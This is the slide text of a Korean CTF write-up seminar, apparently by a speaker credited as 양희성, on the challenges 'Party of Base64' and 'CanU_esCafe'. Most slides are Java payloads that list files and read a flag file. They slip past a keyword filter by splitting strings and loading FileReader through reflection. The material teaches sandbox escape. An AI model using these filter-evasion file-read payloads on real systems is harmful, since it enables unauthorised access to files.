
20회 해킹캠프 CTF 문제 풀이 세미나 - Party of Base64, CanU_esCafe


20회 해킹캠프 CTF 문제 풀이 세미나에서 Party of Base64와 블라인드로 푼 CanU_esCafe의 풀이를 소개했습니다.


20회 해킹캠프 CTF 문제 풀이 세미나 - Party of Base64, CanU_esCafe

  1. 1. 5버플로우 9초전(양희성)
  2. 2. 5버플로우 9초전(양희성)
  3. 3. 누가 파일 안주는 바람에 블라인드로 품
  4. 4. for(java.io.File file :new java.io.File("./").listFiles()) { System.out.println(file.getName()); }
  5. 5. for(java.io.File file :new java.io.File("./").listFiles()) { System.out.println(file.getName()); }
  6. 6. for(String str:java.nio.file.Files.readAllLines(java.nio.file.Paths.get("./flag"))){ System.out.println(str); }
  7. 7. for(String str:java.nio.file.Files.readAllLines(java.nio.file.Paths.get("./flag"))){ System.out.println(str); }
  8. 8. try{ System.out.println(java.nio.file.Files.readAllLines(java.nio.file.Paths.get("./fl"+"ag")).get(0)); }catch(Exception e){}
  9. 9. try{ System.out.println(java.nio.file.Files.readAllLines(java.nio.file.Paths.get("./fl"+"ag")).get(0)); }catch(Exception e){}
  10. 10. try{ Class.forName("es"+"cape").getDeclaredMethod("gogo", new Class[]{}).invoke(new Object[]{}); }catch(Exception e) {} } @SuppressWarnings("unchecked") private static void gogo() throws Exception { Class clazz = Class.forName("java.io.FileRe"+"ader"); Class[] types = {java.io.File.class}; Object[] values = {new java.io.File("fl"+"ag")}; Object obj = clazz.getDeclaredConstructor(types).newInstance(values); int ch; while ((ch = (int) clazz.getMethod("read", new Class[]{}).invoke(obj)) != -1){ System.out.print((char) ch); }
  11. 11. try{ Class.forName("es"+"cape").getDeclaredMethod("gogo", new Class[]{}).invoke(new Object[]{}); }catch(Exception e) {} } @SuppressWarnings("unchecked") private static void gogo() throws Exception { Class clazz2 = Class.forName("java.io.Fi"+"le"); Class[] types2 = {String.class}; Object[] values2 = {"fl"+"ag"}; Object f = clazz2.getDeclaredConstructor(types2).newInstance(values2); Class clazz = Class.forName("java.io.Fi"+"leRe"+"ader"); Class[] types = {clazz2}; Object[] values = {f}; Object obj = clazz.getDeclaredConstructor(types).newInstance(values); int ch; while ((ch = (int) clazz.getMethod("read", new Class[]{}).invoke(obj)) != -1){ System.out.print((char) ch); }
  12. 12. 20000 https://blog.devonnuri.com
